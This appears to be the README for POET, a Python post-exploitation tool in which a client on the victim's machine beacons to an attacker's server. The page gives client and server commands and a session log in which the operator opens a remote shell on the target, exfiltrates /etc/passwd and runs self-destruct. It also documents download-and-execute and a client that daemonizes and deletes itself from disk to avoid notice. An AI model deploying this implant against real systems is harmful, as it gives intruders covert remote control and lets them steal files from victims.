POET is a simple post-exploitation tool to gain a remote shell on target machine.
- remote shell
- file exfiltration
- download and execute
Victim’s Machine (22.214.171.124):
$ ./poet-client 126.96.36.199 10 # poet-client daemonizes, so there's nothing to see
Warning: After running this command, you’ll need to either run selfdestruct from the server, or kill the poet-client process to stop the client.
Attacker’s Machine (188.8.131.52):
$ sudo ./poet-server _ ____ ____ ___ / /_ / __ \/ __ \/ _ \/ __/ / /_/ / /_/ / __/ / / .___/\____/\___/\__/ /_/ [+] (06/28/15 03:58:42) Dropping privileges to uid: 501, gid: 20 [+] (06/28/15 03:58:42) Poet server started (port 443) [+] (06/28/15 03:58:50) Connected By: ('127.0.0.1', 54494) -> VALID [+] (06/28/15 03:58:50) Entering control shell Welcome to posh, the Poet Shell! Running `help' will give you a list of supported commands. posh > help Commands: chint dlexec exec exfil exit help recon selfdestruct shell posh > shell posh > user@server $ uname -a Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux posh > user@server $ ^D posh > exfil /etc/passwd posh : exfil written to archive/20150628/exfil/passwd-201506285917.txt posh > ^D [+] (06/28/15 03:59:18) Exiting control shell [-] (06/28/15 03:59:18) Poet server terminated $ sudo ./poet-server _ ____ ____ ___ / /_ / __ \/ __ \/ _ \/ __/ / /_/ / /_/ / __/ / / .___/\____/\___/\__/ /_/ [+] (06/28/15 03:59:26) Dropping privileges to uid: 501, gid: 20 [+] (06/28/15 03:59:26) Poet server started (port 443) [+] (06/28/15 03:59:28) Connected By: ('127.0.0.1', 54542) -> VALID [+] (06/28/15 03:59:28) Entering control shell Welcome to posh, the Poet Shell! Running `help' will give you a list of supported commands. posh > selfdestruct [!] WARNING: You are about to permanently remove the client from the target. You will immediately lose access to the target. Continue? (y/n) y [+] (06/28/15 03:59:33) Exiting control shell [-] (06/28/15 03:59:33) Poet server terminated
Poet is super easy to use, and requires nothing more than the Python (2.7) standard library. To easily test it out, a typical invocation would look like:
$ ./poet-client 127.0.0.1 1 --debug --no-selfdestruct
By default, the Poet client daemonizes and deletes itself from disk, so that behavior is suppressed using the –debug and –no-selfdestruct flags.
$ sudo ./poet-server
By default, the server needs to be run as root (using sudo) because the default port it binds to is 443. If that makes you uncomfortable, simply omit sudo and use the -p <PORT> flag on both the client and server. Pick a nice, high number for your port (> 1024).
$ ./poet-client -h usage: poet-client [-h] [-p PORT] [--debug] [--no-daemon] [--no-selfdestruct] IP [INTERVAL] positional arguments: IP Poet Server INTERVAL Beacon Interval, in seconds. Default: 600 optional arguments: -h, --help show this help message and exit -p PORT, --port PORT --debug show debug messages. implies --no-daemon --no-daemon don't daemonize --no-selfdestruct don't selfdestruct
Poet is a client/server application. The client is executed on the target and beacons back to the server at a certain time interval. The only required argument is the IP address where the server is or will be running. Following it can optionally be the time interval in seconds of how frequently to beacon back, which defaults to 10 minutes. The port for the client to beacon out on can be specified with the -p flag. All other flags would not be used during “real” usage and exist mainly for debugging.
$ ./poet-server -h usage: poet-server [-h] [-p PORT] [-v] optional arguments: -h, --help show this help message and exit -p PORT, --port PORT -v, --version prints the Poet version number and exits